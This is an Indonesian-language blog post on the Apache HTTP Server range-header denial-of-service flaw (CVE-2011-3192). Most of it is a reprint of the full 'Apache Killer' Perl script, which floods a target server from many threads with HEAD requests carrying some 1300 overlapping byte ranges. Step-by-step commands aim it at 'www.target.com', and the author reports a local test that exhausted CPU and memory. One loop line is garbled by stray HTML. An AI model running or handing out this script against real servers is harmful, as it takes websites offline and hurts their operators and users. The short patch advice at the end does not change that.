APACHE DoS Vulnerability (CVE-2011-3192)
Sekedar info (mungkin sudah banyak yg tahu) kalau terdapat vulnerability pada Apache HTTP Server 1.3.x dan 2.x.x hingga 2.2.19.
klo di database vulnerability mitre.org nama vulnerabilitynya adalah CVE-2011-3192, lebih lengkapnya klik disini
vulnerability ini mengeksploitasi kelemahan Apache dalam menerima range request httpd, sehingga membuat prosesor dan memory server exhausted.
vulnerability ini telah dipatch oleh Apache.org dengan mengeluarkan versi terbaru 2.2.20 pada 31 Agustus 2011 kemarin.
berikut adalah skrip yg ada di Pastebin (sry link-nya ane lupa copy, google-fu aja),
namanya Apache Killer:
#!/usr/bin/perl
#Apache httpd Remote Denial of Service (CPU & memory exhaustion)
#Original by Kingcope
#Altered by W
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#
use IO::Socket;
use threads;
sub usage
{
print "Apache Remote Denial of Service (CPU & memory exhaustion)\n";
print "Originally by Kingcope\n";
print "Altered to use threads by W\n";
print "Usage: $0[page=/] [threads=50]\n";
print "Example: $0 YES www.example.com index.html 50\n";
print "If attack is anything other than 'YES', then the tool will test and exit.\n";
}
sub testapache
{
print "Testing for partial content exploit against $host$path...\n";
my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => "80",
Proto => 'tcp') or die "Can't open socket to $host!\n";
my $p = "HEAD $path HTTP/1.1\r\nHost: $host\r\nRange:bytes=0-5\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;
my $x = <$sock>;
if ($x =~ /Partial/)
{
print "Host: $host appears to be vulnerable to partial content DoS\n";
return 1;
} else {
print "Host: $host appears to not be vulnerable, returned:\n$x";
return 0;
}
}
sub exploitserver
{
my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => "80",
Proto => 'tcp') or return(0);
print $sock $p;
while(<$sock>)
{
}
print ".";
}
if($#ARGV < 1)
{
&usage && exit;
}
$real = ($ARGV[0] eq 'YES');
$host = $ARGV[1];
$path = ($#ARGV > 1) ? '/' . $ARGV[2] : '/';
$numthreads = ($#ARGV > 2) ? $ARGV[3] : 50;
$vuln = &testapache;
srand(time());
my $r = "";
for ($k=0;$k<1300 br="br" k="k">{
$r .= ",5-$k";
}
$p = "HEAD $path HTTP/1.1\r\nHost: $host\r\nRange:bytes=0-5$r\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
if($vuln && $real)
{
my @threads;
$|=1;
print "Running partial content exploit against $host$path using $numthreads threads\n";
for(my $n = 0; $n < $numthreads; $n++)
{
my $thr = async { while(1){ &exploitserver; } };
push(@threads, $thr);
}
foreach(@threads)
{
$_->join();
print($_);
}
}
cara penggunaan skrip diatas adalah:
1. untuk mengetahui apakah server web Apache tersebut vulnerable atau tidak
#perl filename.pl www.target.com
2. untuk melakukan eksploitasi
#perl filename.pl YES www.target.com
ni yg telah ane coba di localhost BT5 dengan Apache versi 2.2.14:
dan hasilnya seperti berikut:
lihat pada Cpu(s): 92.5%us dan Mem: 3094072k total, 2748296k used, 345776k free, lihat juga pada services Apache2 dengan PID berbeda-beda dibawahnya
processor dan RAM kita dibuat bekerja secara maksimal, hal ini pastinya akan menyebabkan server akan mengalami out of service…
jadi segera update Apache server anda :)
semoga bermanfaat
Sumber ikonspirasi.com
No comments:
Post a Comment